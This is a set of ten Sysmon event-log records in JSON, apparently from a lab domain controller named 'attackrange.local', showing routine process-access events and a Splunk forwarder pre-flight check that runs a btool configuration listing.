{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3542,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3543,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3544,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-00102D840500}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-00102D840500}","TargetProcessId":"4916","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3545,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.658\r\nSourceProcessGUID: {41C8662E-1FF6-5F25-0000-00102D840500}\r\nSourceProcessId: 4916\r\nSourceThreadId: 3312\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.658","SourceProcessGUID":"{41C8662E-1FF6-5F25-0000-00102D840500}","SourceProcessId":"4916","SourceThreadId":"3312","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3546,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.691\r\nProcessGuid: {41C8662E-1FF6-5F25-0000-0010F7860500}\r\nProcessId: 1632\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nParentProcessId: 2364\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.691","ProcessGuid":"{41C8662E-1FF6-5F25-0000-0010F7860500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF4-5F25-0000-0010596B0500}","ParentProcessId":"2364","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3547,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nSourceProcessId: 2364\r\nSourceThreadId: 2176\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010F7860500}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18319|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-0010596B0500}","SourceProcessId":"2364","SourceThreadId":"2176","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010F7860500}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18319|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3548,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010F7860500}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010F7860500}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3549,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3550,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
